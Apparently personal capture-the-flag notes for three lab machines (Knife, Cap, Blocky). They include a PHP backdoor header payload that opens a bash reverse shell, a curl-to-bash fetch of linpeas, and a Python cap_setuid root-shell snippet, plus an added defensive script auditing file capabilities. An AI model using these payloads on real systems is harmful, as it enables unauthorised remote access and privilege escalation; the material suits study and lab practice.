Easy shorts

Knife

[!hint] PHP 8.1.0-dev - 'User-Agentt' Remote Code Execution
User-Agentt: zerodiumsystem("bash -c 'bash -i >& /dev/tcp/<your_ip>/<port> 0>&1'");

  • Upgrade a Linux reverse shell to a fully usable TTY shell

[!hint] GTFOBins: knife

Cap

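[!hint] Privilege Escalation
curl http://<target_ip>/linpeas.sh | bash
from: python3 -m http.server 80
Check the output for: Files with capabilities

import os
# Only works when the Python binary carries the cap_setuid file capability
os.setuid(0)            # switch the process UID to root
os.system("/bin/bash")  # start a shell under that UID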
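
The Python snippet above depends on the interpreter carrying the cap_setuid file capability, which is what the "Files with capabilities" finding points at. The audit below is an added example, not part of the original notes: it parses `getcap -r /` output in both libcap layouts and flags risky capabilities. The sample lines, the RISKY_CAPS set and the interpreter name list are assumptions constructed for illustration.

```python
import os
import re

# Capabilities that let a process change identity or bypass file permission checks (assumed set).
RISKY_CAPS = {"cap_setuid", "cap_setgid", "cap_dac_override", "cap_dac_read_search"}
# Programs that execute arbitrary user-supplied code (assumed list, extend as needed).
INTERPRETERS = re.compile(r"^(python|perl|ruby|php|node|lua|bash|sh)[\d.]*$")
CLAUSE = re.compile(r"^([a-z0-9_,]+)[+=]([eip]*)$")


def parse_getcap(output):
    """Parse getcap output: 'path = caps+eip' (older libcap) or 'path caps=eip' (newer)."""
    entries = []
    for line in output.splitlines():
        parts = line.strip().split(None, 1)
        if len(parts) != 2:
            continue  # blank line
        path, rest = parts[0], parts[1].lstrip("= ")
        caps = {}
        for clause in rest.split():
            m = CLAUSE.match(clause)
            if m:  # anything else (e.g. an error message) is ignored
                for name in m.group(1).split(","):
                    caps[name] = m.group(2)
        if caps:
            entries.append((path, caps))
    return entries


def audit(output):
    """Return (severity, path, capability) for each risky capability in the permitted set."""
    findings = []
    for path, caps in parse_getcap(output):
        is_interp = bool(INTERPRETERS.match(os.path.basename(path)))
        for name, flags in sorted(caps.items()):
            if name in RISKY_CAPS and "p" in flags:
                findings.append(("high" if is_interp else "review", path, name))
    return findings


# Constructed sample output, not taken from a real host.
SAMPLE = """\
/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip
/usr/bin/ping cap_net_raw=ep
/opt/tools/backup cap_dac_read_search=ep
"""

if __name__ == "__main__":
    print(audit(SAMPLE))
```

A "high" finding is cleared with `setcap -r <path>` once it is confirmed that the program does not need the capability.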

Blocky

  • enumerate target
  • brute force directories
  • unzip file and decompile with:
  • login as <user> and check privileges/permissions
  • sudo -l | sudo -i | sudo su

[!note] Linux enumeration tools that can be helpful: LinPEAS, LES, LinEnum